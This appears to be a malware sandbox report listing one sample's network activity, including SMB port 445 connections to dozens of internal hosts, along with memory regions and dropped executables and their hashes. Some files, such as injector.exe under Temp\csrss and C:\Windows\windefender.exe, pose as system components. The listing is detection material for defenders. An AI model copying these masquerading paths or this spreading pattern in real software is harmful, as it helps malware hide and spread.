US 8.8.8.8:53 25.4.79.80.in-addr.arpa udp
N/A 127.0.0.1:31465 tcp
N/A 10.127.0.1:445 tcp
N/A 10.127.0.44:445 tcp
N/A 10.127.0.62:445 tcp
N/A 10.127.0.58:445 tcp
N/A 10.127.0.32:445 tcp
N/A 10.127.0.22:445 tcp
N/A 10.127.0.52:445 tcp
N/A 10.127.0.29:445 tcp
N/A 10.127.0.34:445 tcp
N/A 10.127.0.39:445 tcp
N/A 10.127.0.6:445 tcp
N/A 10.127.0.47:445 tcp
N/A 10.127.0.48:445 tcp
N/A 10.127.0.3:445 tcp
N/A 10.127.0.60:445 tcp
N/A 10.127.0.61:445 tcp
N/A 10.127.0.51:445 tcp
N/A 10.127.0.26:445 tcp
N/A 10.127.0.49:445 tcp
N/A 10.127.0.17:445 tcp
N/A 10.127.0.0:445 tcp
N/A 10.127.0.37:445 tcp
N/A 10.127.0.36:445 tcp
N/A 10.127.0.15:445 tcp
N/A 10.127.0.56:445 tcp
N/A 10.127.0.54:445 tcp
N/A 10.127.0.27:445 tcp
N/A 10.127.0.38:445 tcp
N/A 10.127.0.16:445 tcp
N/A 10.127.0.53:445 tcp
N/A 10.127.0.24:445 tcp
N/A 10.127.0.45:445 tcp
N/A 10.127.0.21:445 tcp
N/A 10.127.0.57:445 tcp
N/A 10.127.0.7:445 tcp
N/A 10.127.0.42:445 tcp
N/A 10.127.0.25:445 tcp
N/A 10.127.0.40:445 tcp
N/A 10.127.0.9:445 tcp
N/A 10.127.0.50:445 tcp
N/A 10.127.0.63:445 tcp
N/A 10.127.0.4:445 tcp
N/A 10.127.0.14:445 tcp
N/A 10.127.0.55:445 tcp
N/A 10.127.0.2:445 tcp
N/A 10.127.0.23:445 tcp
N/A 10.127.0.33:445 tcp
N/A 10.127.0.20:445 tcp
N/A 10.127.0.11:445 tcp
N/A 10.127.0.19:445 tcp
N/A 10.127.0.18:445 tcp
N/A 10.127.0.8:445 tcp
N/A 10.127.0.13:445 tcp
N/A 10.127.0.35:445 tcp
N/A 10.127.0.5:445 tcp
N/A 10.127.0.46:445 tcp
N/A 10.127.0.31:445 tcp
N/A 10.127.0.10:445 tcp
N/A 10.127.0.41:445 tcp
N/A 10.127.0.43:445 tcp
N/A 10.127.0.59:445 tcp
N/A 10.127.0.28:445 tcp
N/A 10.127.0.12:445 tcp
N/A 10.127.0.30:445 tcp

Files

memory/2272-1-0x00007FFB3FAC3000-0x00007FFB3FAC4000-memory.dmp

memory/2272-0-0x000001C2F2C50000-0x000001C2F2C7A000-memory.dmp

memory/2272-2-0x000001C2F30A0000-0x000001C2F30FE000-memory.dmp

memory/2272-3-0x00007FFB3FAC0000-0x00007FFB404AC000-memory.dmp

memory/4556-4-0x0000000000400000-0x0000000000408000-memory.dmp

memory/5068-9-0x00007FFB3FAC0000-0x00007FFB404AC000-memory.dmp

memory/5068-11-0x0000020816DF0000-0x0000020816E12000-memory.dmp

memory/5068-15-0x000002082FD40000-0x000002082FDB6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5bacjb4t.2cv.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4556-17-0x000000007378E000-0x000000007378F000-memory.dmp

memory/5068-16-0x00007FFB3FAC0000-0x00007FFB404AC000-memory.dmp

memory/5068-13-0x00007FFB3FAC0000-0x00007FFB404AC000-memory.dmp

memory/5068-56-0x00007FFB3FAC0000-0x00007FFB404AC000-memory.dmp

C:\Users\Admin\Pictures\f54YikNn1ZYOxjLRnnpha6kV.exe

MD5 949f191270e024e75823b32174f15754
SHA1 e2685aee44aaee2bc87888ee7c86d77bba313eae
SHA256 c3356a89f9d9962232df6a5d6dbfb42a9e2b2578b2a8d89c20b61c4c2e72c71c
SHA512 d3eea70b18938ab93b4d659a0dcb793ab1f440614763b005c9e3f9bf36e4ad49c87cd9d436d2821c34c194a6ec384c57351be4bf9164caaf269046d29c01a55a

C:\Users\Admin\Pictures\yNmFIx0VEIOdeJxCA5rHU5LG.exe

MD5 77f762f953163d7639dff697104e1470
SHA1 ade9fff9ffc2d587d50c636c28e4cd8dd99548d3
SHA256 d9e15bb8027ff52d6d8d4e294c0d690f4bbf9ef3abc6001f69dcf08896fbd4ea
SHA512 d9041d02aaca5f06a0f82111486df1d58df3be7f42778c127ccc53b2e1804c57b42b263cc607d70e5240518280c7078e066c07dec2ea32ec13fb86aa0d4cb499

C:\Users\Admin\Pictures\fKZRHEfYlQuPD6l3AskVdPrk.exe

MD5 5b1e924864690254027a694596f93e64
SHA1 009944ff319f0d966db4f3997ba9f87692f7ce8f
SHA256 a227c8047a9b2cff19327b822c89378d4549f0baee2af1e7345e8ede3adbe29e
SHA512 bbb54905892328d16743d2d953df4ac2c10192ac76b4a99248f64d0c675d487bf74af007d52e2196e80bfa61e84fe7604c8f6be5620102bc1d7820dd89e2d798

C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe

MD5 e7d8c688a7e274d4f64ff855ccec3a71
SHA1 1ff69bae4d5e511b840077a0cdf57abe2823e71d
SHA256 4c7f5c70a1e281044e55020112de05cf9369ce8472a4b6f134c8ad0ec5e5195c
SHA512 281dee6add5a183513907650dc592afdd763782753c9580a573527ad5e72ac69ca1d1c503b958d5a6487e54283e51924707d099fc7d2b3656d8650df81b2fce1

C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe

MD5 7aef256be26ba275609ee1490c072b3a
SHA1 c4dc0e50d0a592fa7841b863ca103c245f67ffac
SHA256 a1989a55517bdd0bf69762472a05cd552f653db70a7da45f79f81692ad2944f2
SHA512 4000d2a9b43cff900b4ba9beb60e3fe39160bf9040a24474f411c23055600597b4aea895ed5ccbe61f50fcdb9886e8900a2c0d8789222683aaf427535918fc80

C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe

MD5 6f48d89d3fc445e2f23c6c3c2298fc00
SHA1 a1ba97ff9bb29a7095217a4e7613401d5686bd3f
SHA256 35244577e19a854d4d2e93ae9de3f82678c51f56ea3e7fc4f09455034119a163
SHA512 3d43ab7f1f65ab33a7852611cc80a0aeed357018eab75b3c460632b08fc28ec8d570acdbe2d50b9f8b564661daeba0c0346911528c13c5f70ddcd42dbd80bf02

C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe

MD5 c6275393e9951670df273a3e34a69731
SHA1 a151e6f58288a0a845b9e07628ab610fc4d22e59
SHA256 88b4cf3073182f14ff5e353eb3007049061383d90009cb9b3c18c5098a89c79c
SHA512 daed7e918b153cdc97d671cca4bde0701c05473d921e339ea5ee44c1a0f2c3a128f2c9fca0940a4b38fa73e55c024e351ec6e8d8e5ec11e5339765864435e2b2

C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe

MD5 8938be9b1ac1f7cfc1104628fd55c164
SHA1 3f85babacf62c0443b17c7c5af470dd11648e3b3
SHA256 2f000b4830c2267d4b1d17231a5c249b79a0d62ff2bfd0ef3d01763a5d1b4d03
SHA512 ba2619bbc481c70d85eaf862b60e8cdf4c588540742a8343b057f95212468c41b1ea244376c9122feb69d236cfdc2c2d423c29acb458e40a12c947a398b55a92

C:\Users\Admin\AppData\Local\Temp\u318.0.exe

MD5 ac3b1a30e96b6d89ce98a21bb5b2093a
SHA1 4270104678195b8cad3520a704c556155a0a65b5
SHA256 803946c2712aec2b60b54b3cd7c3375a9a0158e7ccbfbd4ab8a66e6ddfc7d463
SHA512 65e74527ffa9d6e776d063db44322080315a5a9eb13bb67acd61be6e65862ec127366d742beca349c7ca8281e2f67193bafc14c8c0ee3f222b19b452d05c8491

memory/4748-116-0x0000000006CD0000-0x0000000006D06000-memory.dmp

memory/4748-119-0x0000000007340000-0x0000000007968000-memory.dmp

memory/4748-125-0x00000000072B0000-0x00000000072D2000-memory.dmp

memory/4748-128-0x0000000007B90000-0x0000000007EE0000-memory.dmp

memory/4748-127-0x0000000007A50000-0x0000000007AB6000-memory.dmp

memory/4748-126-0x00000000079E0000-0x0000000007A46000-memory.dmp

memory/4748-130-0x00000000086C0000-0x000000000870B000-memory.dmp

memory/4748-129-0x0000000008150000-0x000000000816C000-memory.dmp

memory/4748-149-0x0000000009250000-0x000000000928C000-memory.dmp

memory/4748-198-0x0000000009310000-0x0000000009386000-memory.dmp

memory/1976-342-0x000000006F2F0000-0x000000006F33B000-memory.dmp

memory/1976-347-0x000000000A720000-0x000000000A73E000-memory.dmp

memory/1976-346-0x000000006EE90000-0x000000006F1E0000-memory.dmp

memory/4748-359-0x000000006EE90000-0x000000006F1E0000-memory.dmp

memory/4748-358-0x000000006F2F0000-0x000000006F33B000-memory.dmp

memory/3200-366-0x000000000A470000-0x000000000A504000-memory.dmp

memory/1976-353-0x000000000A780000-0x000000000A825000-memory.dmp

memory/3200-352-0x000000006EE90000-0x000000006F1E0000-memory.dmp

memory/3564-573-0x000000006F2F0000-0x000000006F33B000-memory.dmp

memory/3200-343-0x000000006F2F0000-0x000000006F33B000-memory.dmp

memory/3564-576-0x000000006EE90000-0x000000006F1E0000-memory.dmp

memory/1976-341-0x000000000A740000-0x000000000A773000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\u318.1.exe

MD5 bdd4b83b24911fa921092e096d399ac9
SHA1 1a9d97edbce74e14676b7362a1f35ee87e934448
SHA256 86e8ec464f8b3a2877085e8f0e05d75f451f099cbd8d9973bad7a3e113145b4a
SHA512 ba1382c9cae8242f78ebc6c61a636c167e8efbd5500cd0848c1deb26708d17e033ebc19835677ceb68d96a1c7b5b49b091b047db070dfa31809bdcf3ea791f1d

memory/3932-659-0x0000000000400000-0x0000000002597000-memory.dmp

memory/1976-1015-0x000000000A900000-0x000000000A91A000-memory.dmp

memory/3200-1045-0x000000000A3B0000-0x000000000A3B8000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 358eecb6abe7d5671be391357eda3991
SHA1 4b553e8dfb883cbdcb80db0f7f1ba862b26c08e7
SHA256 cfcfab4ad5c39913e3c10f2de820e22ee17560a0d5f4bd668ea8650d338065b7
SHA512 602175b4414ac140bf624247298d3d85f623d5af3a1f3e4529c1711013f874171a4958b0d8793506f66bd0b031f23320fbd7ec131099a913d5afb302c7b26836

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 1c19c16e21c97ed42d5beabc93391fc5
SHA1 8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68
SHA256 1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05
SHA512 7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 d30b64e41471005564cacc24685d4eb8
SHA1 58a5160710b57ced78891da46398b5f1937c3e50
SHA256 cb4d28a2f2411c5190d42ee1f5a96e407d271f7ee52f7bd8cd8fd7ff8185f7d6
SHA512 130073e0c5218d8e406d9cb0eaba41eb351409f762e342cfc3cb92368f2d12931420c1d52074e26c757dee544e30abb28e711e8b16af446b41825c79147d3bc5

C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe

MD5 975529a4ae6157af49622a32a305264d
SHA1 f510edf122ed1395aeb0b1a87614de7f5db5b10a
SHA256 98f202554f40c2873f149280b6f7e392f4a6a512b6335d2ada4d1ad710498d24
SHA512 3fbea71c6c1b19b7c388fdedd3d9c4957dd3fe415a745f8adc8c06bf99df52fc0706961b469c9f3235246b6f2e4565feeb7142966da94b15db58f916790201ab

memory/524-1246-0x0000000000400000-0x0000000002957000-memory.dmp

C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe

MD5 98a614c32f63103813a9f9ed610f3971
SHA1 e8f90f2f2fa4c72a5b7b65025570ceb6f604b03b
SHA256 fb396e9aa9116781904621cad9ecc9793018d2120d9aa9c4f958c40b2bf62c5b
SHA512 32b1373169fe030a73aadcc110c779559dbf8ce6699155b975ce967cf2dc03207f01fce4c92955ef670d5251c6d792c5343cf4db9daa471914080c8aea0f1ffc

C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe

MD5 d67e7a7d5f9bba90b21f1066d3a87392
SHA1 bf37b605f2decd76265f06a3fb5d0af9c10c0e47
SHA256 34387487f67c14b0d7b1b729945b9ad09fb7c12d4ec71645badb6a21cece1381
SHA512 b8f33d7bd92add0cb3280fc2cfbb2c44ba36f2957a6a7b825dbf7fbc924cdd25bf4301c51e97065adadbe86019884bbfbfa1cf5c08c3773a27d3304d83ce509e

memory/4424-1250-0x0000000000400000-0x0000000002957000-memory.dmp

memory/4228-1252-0x0000000000400000-0x0000000002957000-memory.dmp

memory/1748-1248-0x0000000000400000-0x0000000002957000-memory.dmp

C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe

MD5 79f59301af845feb7f0353e719730f88
SHA1 0946292e91f92aed847553f6a47f9e54a245185c
SHA256 f3c346af7df0f9f3fa14ae26048d62cee389b5a5a181c944564579b594809147
SHA512 e9f6ad0080fa0ce57e5e10738b30ff2f7654361ef30c3ac88e95304f0671ba152c1f42b841dfec196875f3fa7fe4fa918eee711b50728399c3448b2733cee31f

C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

MD5 155858895668173c15814be48c072a5c
SHA1 5f6ac85348f9f76fad4a08bbc56b21e387b7ab33
SHA256 0432514be4fde5c81dc5fbbaca5a35a298bb02b0af034d4c3b65cff3309bf290
SHA512 17605e4e7d7be227cb3508f4a082cd775f81739adfd5512d12ecca448bd3f5ae489d06e55843aa38437415ced66f02a50a2e4a9fb1f941d1016db3ec63604582

memory/5944-1281-0x0000000007FA0000-0x0000000007FEB000-memory.dmp

memory/5960-1276-0x0000000007CB0000-0x0000000008000000-memory.dmp

memory/5944-1316-0x000000006EEA0000-0x000000006EEEB000-memory.dmp

memory/5944-1322-0x00000000094B0000-0x0000000009555000-memory.dmp

memory/5944-1317-0x000000006DE90000-0x000000006E1E0000-memory.dmp

memory/508-1343-0x0000000000400000-0x0000000002574000-memory.dmp

memory/5960-1419-0x000000006DE90000-0x000000006E1E0000-memory.dmp

memory/5960-1418-0x000000006EEA0000-0x000000006EEEB000-memory.dmp

memory/6116-1632-0x000000006EEA0000-0x000000006EEEB000-memory.dmp

memory/6108-1635-0x000000006DE90000-0x000000006E1E0000-memory.dmp

memory/6116-1634-0x000000006DE90000-0x000000006E1E0000-memory.dmp

memory/6108-1633-0x000000006EEA0000-0x000000006EEEB000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 72ff89b6afc5312450c13b4a6263b4d8
SHA1 bf13409317ad3dd997f61b35da84af5c7f532781
SHA256 b88d03da8e82de6e24bde465eb064515c3165dde94d4cadc9f6036917c08a36b
SHA512 673a389b24190e3115fc4539e12ca216a417a59cba78e38b6fefebf8709b468c7c2fc8415429d240a8c03773e65408c7406da57e634e13c87f384929d103b557

memory/5236-2255-0x000000006DE90000-0x000000006E1E0000-memory.dmp

memory/5236-2254-0x000000006EEA0000-0x000000006EEEB000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 1fb2375f911a32f1e2bdc531d290e046
SHA1 43d8c36a0dc1e264f80b3b81e31e18a42e96e73a
SHA256 05037b19f1fc8f7680f48a0fd6977db25c0e6dae7629285eeee53214e4ac8d42
SHA512 eac1cfc4f196fa2d9e36bc8cd98622e5e1d64759027591d42c2ef9f49bd5702500c1e6baf597f2ed746ce767fecc2945f3eb98b9cda83e2cac49b6755072c513

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 955e3e422a5fd7250a3775e1d27c1d0f
SHA1 cd59b87ff60025de0630afd702c3073671e69ab6
SHA256 c421cb486ae81e009d14820c1669ed00e57dc741c8722eefce538bbc3ee3fe2a
SHA512 690ca4f944e91a62df065c08c7b03f6bba29d8d41bd98bdbaf70ef3d928112ace6866aaf276c213244b25f857c55b9cf28652657c94c61dc806b6cbbb6be6e55

memory/5852-2350-0x0000000000400000-0x00000000008AD000-memory.dmp

memory/4060-2466-0x000000006DE90000-0x000000006E1E0000-memory.dmp

memory/4060-2465-0x000000006EEA0000-0x000000006EEEB000-memory.dmp

memory/5168-2515-0x000000006EEA0000-0x000000006EEEB000-memory.dmp

memory/5168-2518-0x000000006DE90000-0x000000006E1E0000-memory.dmp

memory/4708-2783-0x000000006EEA0000-0x000000006EEEB000-memory.dmp

memory/4708-2804-0x000000006DE90000-0x000000006E1E0000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 750674b6fd1a5d1cce13cbe9a79cb4aa
SHA1 197ac6c2545caf02333d809f5a1a2336e718050b
SHA256 11b13596860067158addd8dedf6057990d72aed00de83499c6741282d4ee9037
SHA512 f0039319231185d170596f8c4261a59bcbe88efa4a8a518812fbc4691f1b1d31bf2a8a1d010d8b8859cf9da700ac15051f59e2677f6702a36f2b3ef3c02dc9ce

C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

MD5 1267857f0994b1877c41bc66a6cfe1b3
SHA1 5386994c7b30162fa690ffc60df38ef8f31fac59
SHA256 6395030553d2217ec6a5c03656fe8277a76880c48398fd4aaa190747f8ef793c
SHA512 f4cafa6bbc1121727e98c6867575f2a0e65143176b1f1c0013e2171b809717d869ac43b1eac73e1b082a9f0e6453f964a4fcd499b54e253dfb0fbd273faff984

memory/4148-3197-0x000000006DE90000-0x000000006E1E0000-memory.dmp

memory/4148-3196-0x000000006EEA0000-0x000000006EEEB000-memory.dmp

memory/4528-3434-0x000000006DE90000-0x000000006E1E0000-memory.dmp

memory/4528-3433-0x000000006EEA0000-0x000000006EEEB000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 b5d8cd6ab952c3505196d44e93e330d7
SHA1 cf09b0fdc616a65f4070d73fe6494cc9dfd972c9
SHA256 a57aa91f1fe4448835be357842e6e0555a8c3143f2cd239a600c98bc28bf4058
SHA512 342cf873976a83ac48d6eb869d6887c8e2fc40a5429c3137951ef5a7d3c8b7931a15176b439265ba36ab72e150515b6a38e076c77d32eb50a5c6b916c646bb61

memory/5852-3455-0x0000000000400000-0x00000000008AD000-memory.dmp

memory/4604-3523-0x0000023E4FFC0000-0x0000023E537F4000-memory.dmp

memory/4604-3592-0x0000023E6DD00000-0x0000023E6DD0C000-memory.dmp

memory/4604-3648-0x0000023E6DD30000-0x0000023E6DD54000-memory.dmp

memory/4604-3647-0x0000023E6DC90000-0x0000023E6DCA4000-memory.dmp

memory/4604-3591-0x0000023E53BC0000-0x0000023E53BD0000-memory.dmp

memory/4604-3590-0x0000023E6F5C0000-0x0000023E6F6CA000-memory.dmp

memory/5592-3691-0x0000000000400000-0x0000000002957000-memory.dmp

memory/5676-3702-0x0000000000400000-0x0000000002957000-memory.dmp

memory/5592-3709-0x0000000000400000-0x0000000002957000-memory.dmp

memory/5632-3701-0x0000000000400000-0x0000000002957000-memory.dmp

memory/4764-3717-0x000000006DE90000-0x000000006E1E0000-memory.dmp

memory/4764-3716-0x000000006EEA0000-0x000000006EEEB000-memory.dmp

memory/5604-3692-0x0000000000400000-0x0000000002957000-memory.dmp

memory/5388-3729-0x000000006DE90000-0x000000006E1E0000-memory.dmp

memory/5388-3726-0x000000006EEA0000-0x000000006EEEB000-memory.dmp

memory/2272-3703-0x00007FFB3FAC3000-0x00007FFB3FAC4000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 a2b875853a499c113cb1b765cc193e3f
SHA1 b7ad94bd96dd14fedcc5344767b438343e03a59d
SHA256 dd3ed40b6159ed3322d7766b04c6822b07d6bf13990e94fa9df7cad209773f43
SHA512 ce1780375c1422401e644336ccd744e0a0e299df23c68ce670af32b8e0856165c154cc5346e21a62b1bdacca5a6f775d4159e3b3d2ac783dcdfa4623fc24b18a

memory/5604-4152-0x0000000000400000-0x0000000002957000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 bf3f4f736a91ad59bbe0e957ef7bfd6b
SHA1 ae51812ab1d3f1313fac8335eed904e9f6f0cbcf
SHA256 76eba60573d689954cabddbe655eb208ab97184eedc6c6992ff71344bacb0ed9
SHA512 b47c3d96f5a52eebea8e76d2906a954ee01dad3227213fc55ec98d430dee0aedd782332799787adb9c6c22b0f4795f75365f185d40b63e45e5b03c1f0c41bf39

memory/5676-4185-0x0000000000400000-0x0000000002957000-memory.dmp

memory/4792-4191-0x000000006EEA0000-0x000000006EEEB000-memory.dmp

memory/4792-4197-0x0000000009DF0000-0x0000000009E95000-memory.dmp

memory/5632-4186-0x0000000000400000-0x0000000002957000-memory.dmp

memory/4792-4192-0x000000006DE90000-0x000000006E1E0000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 9e5d4838761dcf4c5f2ecc94711ac05d
SHA1 1aebd2a150d5608522d610c19f1473fcad4f4d46
SHA256 4f0b4b78cea8c36ef4cf51478810dc46952e59098a7566435a8ae65b45c2117b
SHA512 1d28cdcc73359119a9ba4cd2a9624f7ea84e9d677fde57da910b8b703d0322422ebf9532aae534a43ea7b5c23662e8879338bea27e7edbd411cbe4c933a56710

memory/2272-4413-0x00007FFB3FAC0000-0x00007FFB404AC000-memory.dmp

memory/5616-4414-0x00000000077E0000-0x0000000007B30000-memory.dmp

memory/5616-4416-0x0000000008340000-0x000000000838B000-memory.dmp

memory/4604-4437-0x0000023E6DCE0000-0x0000023E6DCEA000-memory.dmp

memory/4604-4445-0x0000023E6FAB0000-0x0000023E6FB00000-memory.dmp

memory/4604-4444-0x0000023E6FA30000-0x0000023E6FA5A000-memory.dmp

memory/4604-4443-0x0000023E6F960000-0x0000023E6FA12000-memory.dmp

memory/5616-4442-0x0000000009390000-0x0000000009435000-memory.dmp

memory/4604-4518-0x0000023E6FB30000-0x0000023E6FE30000-memory.dmp

memory/4604-4514-0x0000023E6DCF0000-0x0000023E6DCFA000-memory.dmp

memory/5616-4436-0x000000006EFF0000-0x000000006F340000-memory.dmp

memory/5616-4435-0x000000006F430000-0x000000006F47B000-memory.dmp

memory/4604-4632-0x0000023E73C60000-0x0000023E73C68000-memory.dmp

memory/4604-4658-0x0000023E73CC0000-0x0000023E73CC8000-memory.dmp

memory/4604-4664-0x0000023E74E70000-0x0000023E74E92000-memory.dmp

memory/4604-4668-0x0000023E753C0000-0x0000023E758E6000-memory.dmp

memory/4604-4671-0x0000023E74E00000-0x0000023E74E0C000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 887ac41750ae13a63c0c1ab30203d5c7
SHA1 b3dd192c73b40b368bc817fb51ccb180b2823abc
SHA256 8013a868a8a87833990672c0582e2362d2a53b6969cd73da133570211ab67dfd
SHA512 dccc3a4ee3a74eb69b17f04f62026d4ac4e17ebab70975ee4c7efbce95e9150dd20651c6fbd60cdc763084d1a1198919b6c17fa9705ab06349a3afa70202da03

memory/4604-4662-0x0000023E74E10000-0x0000023E74E72000-memory.dmp

memory/4604-4659-0x0000023E74DF0000-0x0000023E74DFA000-memory.dmp

memory/4604-4657-0x0000023E74AF0000-0x0000023E74B28000-memory.dmp

memory/2680-4691-0x000000006F430000-0x000000006F47B000-memory.dmp

memory/2680-4692-0x000000006EFF0000-0x000000006F340000-memory.dmp

memory/4556-4905-0x000000007378E000-0x000000007378F000-memory.dmp

memory/4604-4906-0x0000023E74EB0000-0x0000023E74ECE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

memory/508-4913-0x0000000000400000-0x0000000002574000-memory.dmp

memory/3204-4914-0x0000000000400000-0x0000000002957000-memory.dmp

C:\Windows\windefender.exe

MD5 8e67f58837092385dcf01e8a2b4f5783
SHA1 012c49cfd8c5d06795a6f67ea2baf2a082cf8625
SHA256 166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa
SHA512 40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

memory/5056-4922-0x0000000000400000-0x00000000008DF000-memory.dmp

C:\Windows\windefender.exe

MD5 eac3c94e166a4ac3e7d3dbf26d505ebb
SHA1 c231e723ad6077f9b6bd12c5e7bd3fd208f7fa45
SHA256 662eb9030b85d481e53772eb13a1b747a62bc68a862e0e4ba90f4e6acb3fe124
SHA512 b5b0f2d3205ebf43593ae73318cc078b5eafed92be6c8d113cf0e7dbef9f84da759301393b9528ac7f11b2f82dd8a190ad5c2b9066c84afbc1c9fb775fcff1a0

memory/3204-4924-0x0000000000400000-0x0000000002957000-memory.dmp

memory/508-4927-0x0000000000400000-0x0000000002574000-memory.dmp

memory/3204-4928-0x0000000000400000-0x0000000002957000-memory.dmp

memory/3204-4931-0x0000000000400000-0x0000000002957000-memory.dmp

memory/5276-4932-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/508-4933-0x0000000000400000-0x0000000002574000-memory.dmp

memory/3204-4934-0x0000000000400000-0x0000000002957000-memory.dmp

memory/3204-4937-0x0000000000400000-0x0000000002957000-memory.dmp

memory/508-4939-0x0000000000400000-0x0000000002574000-memory.dmp

memory/3204-4940-0x0000000000400000-0x0000000002957000-memory.dmp

memory/5276-4941-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/3204-4943-0x0000000000400000-0x0000000002957000-memory.dmp

memory/3204-4946-0x0000000000400000-0x0000000002957000-memory.dmp

memory/3204-4949-0x0000000000400000-0x0000000002957000-memory.dmp

memory/3204-4952-0x0000000000400000-0x0000000002957000-memory.dmp

memory/3204-4955-0x0000000000400000-0x0000000002957000-memory.dmp

memory/3204-4958-0x0000000000400000-0x0000000002957000-memory.dmp

memory/3204-4961-0x0000000000400000-0x0000000002957000-memory.dmp

memory/3204-4964-0x0000000000400000-0x0000000002957000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 24b4d7db201bfd1631e0ccbed1627df8
SHA1 707216ce680c880ee755c6cc72dc9c02c284a949
SHA256 23e1f2e75be07a8026bf98f426c585a41af270212b5f88dc4462b4d6c116fb39
SHA512 f41830cda1d79d15dcee984923846c62ac65908fdaf664fc355eaeee7a9ec59ae176cf73b8f57c7150d081fca0f895c18df47e5547ea3dc6944b0259c3ec5c78

C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe

MD5 dcb505dc2b9d8aac05f4ca0727f5eadb
SHA1 4f633edb62de05f3d7c241c8bc19c1e0be7ced75
SHA256 61f9194b9f33611ec902f02755cf2e86f0bbc84c2102c6e5d1874f9bae78e551
SHA512 31e1fce9aca3b5d9afc85640af04b4542b9897f7d60b699e3153516137d9358d3c101cacc04e9e594e36b8622e9489cecf0dda210662563565d80fb9a33549b3

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 edf05d3be7c5375eb1349c2d99f5a6b1
SHA1 7ff1964936a6aa03459013d980f94ac38a424e40
SHA256 4eb405e06c90d7ac967c32aa1068e447fcd67b83fd2526b7ea902bf4c64f99df
SHA512 44873704587c07f1f697affffe90a8758ef9075543aa7e4555f51cb2fb446f631c1357ac98c8e966c83c53c04e60f9266f131e068a13d3228305e57613039687

C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe

MD5 713674d5e968cbe2102394be0b2bae6f
SHA1 90ac9bd8e61b2815feb3599494883526665cb81e
SHA256 f724b2849e7dc38bf62114c11092020073bea509e2bc57dea7a94a2fc9c23057
SHA512 e9fba80067ac39d5907560abd044bb97dfcf078db2b6696ff4ca5990d9803a0c24b39d04e05682ac3dac8bc472e2ee0c573a46514e907f4d9673d4e7a76caafb

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 43fe051fe3c3ff13cb2ac93081dc160a
SHA1 a0aa9aabed6d3fbd5eb45a30416642f94c2f7910
SHA256 1f311efa0946f01d5031de7e718802a7e7db8725c463b85f1ee013f3ed2205ed
